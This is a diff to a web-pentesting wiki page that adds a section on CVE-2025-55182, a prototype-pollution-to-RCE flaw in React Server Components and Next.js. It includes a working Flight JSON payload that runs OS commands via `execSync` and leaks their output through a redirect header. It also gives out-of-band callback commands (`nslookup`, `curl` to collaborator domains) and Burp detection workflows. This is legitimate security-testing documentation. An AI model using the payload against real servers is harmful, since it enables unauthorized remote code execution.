diff --git a/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.md b/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.md index 50f30e6f5af..2bba1d5945f 100644 --- a/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.md +++ b/src/pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.md @@ -747,6 +747,55 @@ Object.prototype.env = { require("./usage.js") ``` +## React Server Components Flight PP2RCE (CVE-2025-55182) + +React Server Components (RSC) exchange component trees over the Flight protocol, which is typically transported as `multipart/form-data` where each part contains JSON-like chunks with `$:` references. In React `19.0.0–19.2.0` / Next.js `15.0.4–16.0.6` the server-side resolver lets attackers point those references at magic properties such as `__proto__`, enabling prototype pollution that quickly escalates to arbitrary JavaScript and OS command execution inside the Node.js worker. For enumerating exposed RSC endpoints, see the [NextJS pentesting notes](../../../network-services-pentesting/pentesting-web/nextjs.md). + +### Flight exploitation flow + +1. **Reach an RSC endpoint** (usually identified by a `Next-Action` header and `react-server-dom-webpack` content-type) and send a crafted multipart POST that Flight will deserialize. +2. **Pollute core prototypes** by assigning references such as `"then": "$1:__proto__:then"`. When the resolver walks that path it writes a controllable `then` into `Object.prototype`, giving the attacker influence over subsequent promise/thenable handling. +3. **Pivot to the global `Function` constructor** by pointing `_response._formData.get` at `"$1:constructor:constructor"`. When the runtime later calls `_formData.get()` it actually runs `Function()`. +4. **Execute Node primitives via `_response._prefix`**, e.g. `process.mainModule.require('child_process').execSync('COMMAND')`, to spawn OS commands under the Next.js worker account. +5. **Exfiltrate command output** by throwing a `NEXT_REDIRECT` error whose `digest` is `NEXT_REDIRECT;push;/login?a=${res};307;`. Next.js forwards this into the `x-action-redirect` header of the HTTP 303 response, so attackers instantly see their command output. + +### Example Flight chunk + +```json +{ + "then": "$1:__proto__:then", + "status": "resolved_model", + "reason": -1, + "value": "{\"then\":\"$B1337\"}", + "_response": { + "_prefix": "var res=process.mainModule.require('child_process').execSync('COMMAND').toString().trim();throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${res};307;`});", + "_chunks": "$Q2", + "_formData": { "get": "$1:constructor:constructor" } + } +} +``` + +### Safe verification primitives + +- **In-band math PoC (Unix-like):** Execute `echo $((31337*31337))` via `execSync`. The result `982013569` must appear inside the `x-action-redirect` header of a `303` response together with the `NEXT_REDIRECT` digest, proving arbitrary command execution without touching the filesystem or network. +- **Windows-safe PoC:** Swap the payload to `powershell -c "31337*31337"`. The same `982013569` sentinel flowing through `x-action-redirect` proves a vulnerable Windows Node.js host. +- **Out-of-band validation:** When WAF/CDN layers strip headers or responses, run a command like `nslookup .burpcollaborator.net` (or `curl https://.oastify.com`) from `_prefix`. Any DNS/HTTP interaction observed by the collaborator confirms exploitation even if the HTTP response is empty. + +### Burp Bounty Pro detection profiles + +Use **Extensions → Burp Bounty Pro → About → Check For Updates** to pull three purpose-built checks: + +- `CVE-2025-55182_React2Shell_RCE` – in-band profile that injects the Unix math command, watches for `303` redirects, and flags hosts only when `x-action-redirect` contains `982013569` to minimize false positives. +- `CVE-2025-55182_React2Shell_RCE_OOB` – identical Flight payload structure but executes a collaborator callback so blind deployments or aggressively sanitized responses still register as RCE via Burp Collaborator events. +- `CVE-2025-55182_React2Shell_RCE_Windows` – reuses the math technique with a PowerShell expression to safely test Windows-based Next.js stacks. + +### Operational workflow + +1. Run the in-band profile first for fast confirmation; it needs only a single HTTP request. +2. If headers/body are missing or WAF interference is suspected, immediately repeat with the OOB profile and monitor Burp Collaborator. +3. When targeting Windows infrastructure, add the Windows profile to confirm code execution using native tooling. + + ## VM Gadgets In the paper [https://arxiv.org/pdf/2207.11171.pdf](https://arxiv.org/pdf/2207.11171.pdf) is also indicated that the control of **`contextExtensions`** from some methods of the **`vm`** library could be used as a gadget.\ @@ -779,6 +828,7 @@ In [**this commit**](https://github.com/nodejs/node/commit/0313102aaabb49f78156c - [https://portswigger.net/research/prototype-pollution-node-no-filesystem](https://portswigger.net/research/prototype-pollution-node-no-filesystem) - [https://www.nodejs-security.com/blog/2024/prototype-pollution-regression](https://www.nodejs-security.com/blog/2024/prototype-pollution-regression) - [https://portswigger.net/research/server-side-prototype-pollution](https://portswigger.net/research/server-side-prototype-pollution) +- [CVE-2025-55182 (React2Shell): New Detection Profiles for Burp Bounty Pro](https://bountysecurity.ai/blogs/news/cve-2025-55182-react2shell-new-detection-profiles-for-burp-bounty-pro) {{#include ../../../banners/hacktricks-training.md}}